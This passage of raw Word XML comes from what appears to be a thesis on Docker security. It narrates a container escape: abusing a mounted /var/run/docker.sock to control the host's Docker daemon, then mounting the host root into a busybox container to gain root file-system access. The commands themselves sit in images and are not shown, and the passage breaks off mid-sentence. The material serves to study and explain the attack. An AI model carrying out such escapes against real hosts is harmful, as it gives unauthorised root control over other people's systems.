      </w:r>
      <w:r w:rsidR="00F66DB0">
        <w:t xml:space="preserve">; however, escaping to the host </w:t>
      </w:r>
      <w:r w:rsidR="00DC2FAA">
        <w:t xml:space="preserve">requires a container </w:t>
      </w:r>
      <w:r w:rsidR="00B40903">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00DC2FAA">
        <w:t xml:space="preserve"> run </w:t>
      </w:r>
      <w:r w:rsidR="008863BF">
        <w:t>Docker engine inside another container.</w:t>
      </w:r>
      <w:r w:rsidR="00E834A5">
        <w:t xml:space="preserve"> To achieve this, the author </w:t>
      </w:r>
      <w:r w:rsidR="007B271C">
        <w:t>applied the Docker commands in figure 62</w:t>
      </w:r>
      <w:r w:rsidR="00F40946">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00FA564A">
        <w:t>enabl</w:t>
      </w:r>
      <w:r w:rsidR="00F40946">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00FA564A">
        <w:t xml:space="preserve"> the attacker to launch a container</w:t>
      </w:r>
      <w:r w:rsidR="006A2F2D">
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidR="00CA0630">
        <w:t xml:space="preserve">Docker features and </w:t>
      </w:r>
      <w:r w:rsidR="00C42A1E">
        <w:t>its volume mounted to</w:t>
      </w:r>
      <w:r w:rsidR="00A847C8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C42A1E">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00CA0630">
        <w:t>/var/run/docker.sock</w:t>
      </w:r>
      <w:r w:rsidR="00F40946">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006F2977">
        <w:t xml:space="preserve"> In Docker, the /var/run/docker.sock is</w:t>
      </w:r>
      <w:r w:rsidR="007E605D">
        <w:t xml:space="preserve"> the Unix socket </w:t>
      </w:r>
      <w:r w:rsidR="00BC77EF">
        <w:t>that allows API calls to communicate</w:t>
      </w:r>
      <w:r w:rsidR="002F1D19">
        <w:t xml:space="preserve"> by default.</w:t>
      </w:r>
      <w:r w:rsidR="00825EED">
        <w:t xml:space="preserve"> For this reason, the attacker can abuse th</w:t>
      </w:r>
      <w:r w:rsidR="00366FD5">
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00546ACA">
        <w:t>docker.sock</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00366FD5">
        <w:t xml:space="preserve"> exposure</w:t>
      </w:r>
      <w:r w:rsidR="00C23F50">
        <w:t xml:space="preserve"> as </w:t>
      </w:r>
      <w:r w:rsidR="00AC4457">
        <w:t xml:space="preserve">mounting the Docker daemon </w:t>
      </w:r>
      <w:r w:rsidR="00C23F50">
        <w:t xml:space="preserve">socket gives the </w:t>
      </w:r>
      <w:r w:rsidR="005A34F6">
        <w:t xml:space="preserve">daemon’s </w:t>
      </w:r>
      <w:r w:rsidR="002309B1">
        <w:t>control to the attacker container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFD88D2" w14:textId="4370FC0D" w:rsidR="00C01B9F" w:rsidRDefault="00C01B9F" w:rsidP="00C01B9F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CCCA14D" wp14:editId="1154D3A1">
            <wp:extent cx="5422900" cy="288648"/>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22900" cy="288648"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60825770" w14:textId="0B51AB5C" w:rsidR="00C01B9F" w:rsidRDefault="00C01B9F" w:rsidP="000336D4">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="212" w:name="_Toc86858653"/>
      <w:bookmarkStart w:id="213" w:name="_Toc86867543"/>
      <w:r w:rsidRPr="000336D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="000336D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="000336D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="000336D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>62</w:t>
      </w:r>
      <w:r w:rsidRPr="000336D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="000336D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="000336D4" w:rsidRPr="000336D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploiting Docker socket.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="212"/>
      <w:bookmarkEnd w:id="213"/>
    </w:p>
    <w:p w14:paraId="203D81F3" w14:textId="32AB6F9B" w:rsidR="001D2EDA" w:rsidRDefault="001D2EDA" w:rsidP="00143E8C">
      <w:r>
        <w:t xml:space="preserve">The attacker can </w:t>
      </w:r>
      <w:r w:rsidR="00813894">
        <w:t xml:space="preserve">now run Docker commands on the container </w:t>
      </w:r>
      <w:r w:rsidR="0072791F">
        <w:t>as it</w:t>
      </w:r>
      <w:r w:rsidR="00B676E9">
        <w:t xml:space="preserve"> is launched to</w:t>
      </w:r>
      <w:r w:rsidR="0072791F">
        <w:t xml:space="preserve"> provide Docker pla</w:t>
      </w:r>
      <w:r w:rsidR="00FD03C5">
        <w:t>tform</w:t>
      </w:r>
      <w:r w:rsidR="00C73855">
        <w:t xml:space="preserve">, and the Docker daemon is </w:t>
      </w:r>
      <w:r w:rsidR="00AA1158">
        <w:t xml:space="preserve">under </w:t>
      </w:r>
      <w:r w:rsidR="002D7D6C">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00AA1158">
        <w:t xml:space="preserve">full control of the </w:t>
      </w:r>
      <w:r w:rsidR="008D48A0">
        <w:t>attacker’s container</w:t>
      </w:r>
      <w:r w:rsidR="00BE5681">
        <w:t>. As such, the attacker executes the Docker commands in figure 63</w:t>
      </w:r>
      <w:r w:rsidR="008541B4">
        <w:t>, escaping</w:t>
      </w:r>
      <w:r w:rsidR="005D581F">
        <w:t xml:space="preserve"> one level</w:t>
      </w:r>
      <w:r w:rsidR="00435C16">
        <w:t xml:space="preserve"> to see what </w:t>
      </w:r>
      <w:r w:rsidR="00A54D04">
        <w:t>Docker images are running on the host machine</w:t>
      </w:r>
      <w:r w:rsidR="00FA4E87">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00321155">
        <w:t xml:space="preserve"> Because the daemon is wholly mounted</w:t>
      </w:r>
      <w:r w:rsidR="0039633A">
        <w:t xml:space="preserve"> to the attacker’s container, the attacker can </w:t>
      </w:r>
      <w:r w:rsidR="00576EFA">
        <w:t>run and execute Docker commands remotely via the Docker socket</w:t>
      </w:r>
      <w:r w:rsidR="00611778">
        <w:t xml:space="preserve">. As a result, this vulnerability enabled the attacker to </w:t>
      </w:r>
      <w:r w:rsidR="00620949">
        <w:t xml:space="preserve">exploit and </w:t>
      </w:r>
      <w:r w:rsidR="00080FD5">
        <w:t xml:space="preserve">execute </w:t>
      </w:r>
      <w:r w:rsidR="00080FD5">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">commands </w:t>
      </w:r>
      <w:r w:rsidR="00047FB2">
        <w:t>from his/her container. This means that</w:t>
      </w:r>
      <w:r w:rsidR="009F7549">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00047FB2">
        <w:t>the attacker can stop, delete</w:t>
      </w:r>
      <w:r w:rsidR="009F7549">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="004379DB">
        <w:t>or remove any images or containers on the Docker host</w:t>
      </w:r>
      <w:r w:rsidR="00CF4EBF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1DEA54" w14:textId="4F364E98" w:rsidR="00BF208C" w:rsidRDefault="00BF208C" w:rsidP="00BF208C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="012853F2" wp14:editId="03292417">
            <wp:extent cx="4845050" cy="1674779"/>
            <wp:effectExtent l="0" t="0" r="0" b="190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845050" cy="1674779"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7171F748" w14:textId="183C5508" w:rsidR="00964871" w:rsidRDefault="00964871" w:rsidP="00831F5E">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="214" w:name="_Toc86858654"/>
      <w:bookmarkStart w:id="215" w:name="_Toc86867544"/>
      <w:r w:rsidRPr="00831F5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00831F5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00831F5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00831F5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>63</w:t>
      </w:r>
      <w:r w:rsidRPr="00831F5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00831F5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Identifying Docker images on the host via the Docker socket.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="214"/>
      <w:bookmarkEnd w:id="215"/>
    </w:p>
    <w:p w14:paraId="45F8D333" w14:textId="26B08DA7" w:rsidR="007B752E" w:rsidRDefault="008676D6" w:rsidP="007B752E">
      <w:r>
        <w:t xml:space="preserve">Similarly, the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00CF3AEE">
        <w:t>launched another container</w:t>
      </w:r>
      <w:r w:rsidR="000F6C62">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005979F7">
        <w:t>based on busybox, mounting the root directory</w:t>
      </w:r>
      <w:r w:rsidR="00C73EB9">
        <w:t xml:space="preserve"> “/” to </w:t>
      </w:r>
      <w:r w:rsidR="00561056">
        <w:t>the “/host” directory</w:t>
      </w:r>
      <w:r w:rsidR="007F6572">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00184CD0">
        <w:t>is created inside another container</w:t>
      </w:r>
      <w:r w:rsidR="00AE1C7E">
        <w:t>, as shown in figure 64</w:t>
      </w:r>
      <w:r w:rsidR="007F6572">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F75A8A">
        <w:t xml:space="preserve"> The reason for using busybox </w:t>
      </w:r>
      <w:r w:rsidR="003F7EF6">
        <w:t>Linux distribution is because it is lightweight and in</w:t>
      </w:r>
      <w:r w:rsidR="007F52C8">
        <w:t>cludes many Linux utilities.</w:t>
      </w:r>
      <w:r w:rsidR="00044C58">
        <w:t xml:space="preserve"> As can be seen, the container </w:t>
      </w:r>
      <w:r w:rsidR="00FC2079">
        <w:t xml:space="preserve">runs in root privilege, and thus the attacker can easily </w:t>
      </w:r>
      <w:r w:rsidR="00F26778">
        <w:t>exploit the host file system, as the entire root directory is mapped on</w:t>
      </w:r>
      <w:r w:rsidR="00964607">
        <w:t>to the “/host” directory on the host.</w:t>
      </w:r>
      <w:r w:rsidR="0046485A">
        <w:t xml:space="preserve"> As a result, the attacker gain</w:t>
      </w:r>
      <w:r w:rsidR="00643075">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="0046485A">
        <w:t xml:space="preserve"> full access with root privilege</w:t>
      </w:r>
      <w:r w:rsidR="00063948">
        <w:t xml:space="preserve"> to the Docker host </w:t>
      </w:r>
      <w:r w:rsidR="00B3589A">
        <w:t>and surf</w:t>
      </w:r>
      <w:r w:rsidR="00F06564">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="00B3589A">
        <w:t xml:space="preserve"> on the host file system directories</w:t>
      </w:r>
      <w:r w:rsidR="003815C6">
        <w:t>, shown in figure 65</w:t>
      </w:r>
      <w:r w:rsidR="00B3589A">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00080A30">
        <w:t xml:space="preserve"> This implies that</w:t>
      </w:r>
      <w:r w:rsidR="00A56099">
        <w:t xml:space="preserve"> the attacker can modify, delete</w:t>
      </w:r>
      <w:r w:rsidR="00F1499A">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="007C556E">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidR="00A365A4">
        <w:t>remove con</w:t>
      </w:r>
      <w:r w:rsidR="00376848">
        <w:t xml:space="preserve">fidential </w:t>
      </w:r>
      <w:r w:rsidR="00F1499A">
        <w:t>files on the host. Alternatively</w:t>
      </w:r>
      <w:r w:rsidR="00CF2B89">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00FF2D5F">
        <w:t>he/she</w:t>
      </w:r>
      <w:r w:rsidR="00C46E48">
        <w:t xml:space="preserve"> can </w:t>
      </w:r>
      <w:r w:rsidR="00F36FB9">
        <w:t>create and run malicious script</w:t>
      </w:r>
      <w:r w:rsidR="00867299">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00F36FB9">
        <w:t xml:space="preserve"> on the host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A58F9DD" w14:textId="46875091" w:rsidR="00597282" w:rsidRDefault="00597282" w:rsidP="00597282">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15E043CE" wp14:editId="5796015D">
            <wp:extent cx="4133850" cy="584200"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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133850" cy="584200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="502AB67F" w14:textId="40027644" w:rsidR="00AE1C7E" w:rsidRDefault="00AE1C7E" w:rsidP="00D70C61">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="216" w:name="_Toc86858655"/>
      <w:bookmarkStart w:id="217" w:name="_Toc86867545"/>
      <w:r w:rsidRPr="00D70C61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00D70C61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D70C61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D70C61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70C61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D70C61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="007F52C8" w:rsidRPr="00D70C61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Creating a container </w:t>
      </w:r>
      <w:r w:rsidR="00D70C61" w:rsidRPr="00D70C61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mapped to the host directory.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="216"/>
      <w:bookmarkEnd w:id="217"/>
    </w:p>
    <w:p w14:paraId="10FB8EBA" w14:textId="77777777" w:rsidR="003815C6" w:rsidRPr="003815C6" w:rsidRDefault="003815C6" w:rsidP="003815C6"/>
    <w:p w14:paraId="5C9E3A8D" w14:textId="343574E2" w:rsidR="003815C6" w:rsidRDefault="003815C6" w:rsidP="003815C6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="555FDAD0" wp14:editId="595A470F">
            <wp:extent cx="5149850" cy="1176542"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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149850" cy="1176542"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D1E157" w14:textId="2E2D87D0" w:rsidR="00295406" w:rsidRDefault="00295406" w:rsidP="00275F4C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="218" w:name="_Toc86858656"/>
      <w:bookmarkStart w:id="219" w:name="_Toc86867546"/>
      <w:r w:rsidRPr="00275F4C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00275F4C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00275F4C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00275F4C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>65</w:t>
      </w:r>
      <w:r w:rsidRPr="00275F4C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00275F4C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Surfing on the host d</w:t>
      </w:r>
      <w:r w:rsidR="00275F4C" w:rsidRPr="00275F4C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>irectories</w:t>
      </w:r>
      <w:r w:rsidR="00275F4C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="218"/>
      <w:bookmarkEnd w:id="219"/>
    </w:p>
    <w:p w14:paraId="00BDFA37" w14:textId="679BEF2D" w:rsidR="00867299" w:rsidRDefault="00867299" w:rsidP="00867299">
      <w:r>
        <w:t xml:space="preserve">This attack </w:t>
      </w:r>
      <w:r w:rsidR="0038015E">
        <w:t xml:space="preserve">leveraged the Unix socket </w:t>
      </w:r>
      <w:r w:rsidR="008E2B1D">
        <w:t>and exposed ports</w:t>
      </w:r>
      <w:r w:rsidR="00DD04F7">
        <w:t xml:space="preserve"> vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="008E2B1D">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="004B1934">
        <w:t>access the entire Docker host file system</w:t>
      </w:r>
      <w:r w:rsidR="005D332D">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0000276D">
        <w:t xml:space="preserve"> and its impact can jeopardize</w:t>
      </w:r>
      <w:r w:rsidR="002932C6">
        <w:t xml:space="preserve"> confidential inform</w:t>
      </w:r>
      <w:r w:rsidR="00167665">
        <w:t xml:space="preserve">ation of enterprises </w:t>
      </w:r>
      <w:r w:rsidR="00167665">
        <w:lastRenderedPageBreak/>
        <w:t>and individuals</w:t>
      </w:r>
      <w:r w:rsidR="00880E04">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001E29F7">
        <w:t xml:space="preserve"> Suppose the Docker host </w:t>
      </w:r>
      <w:r w:rsidR="00723715">
        <w:t xml:space="preserve">was </w:t>
      </w:r>
      <w:r w:rsidR="00B138F2">
        <w:t>hosting</w:t>
      </w:r>
      <w:r w:rsidR="00723715">
        <w:t xml:space="preserve"> multiple </w:t>
      </w:r>
      <w:r w:rsidR="00390FD0">
        <w:t>containers</w:t>
      </w:r>
      <w:r w:rsidR="00723715">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
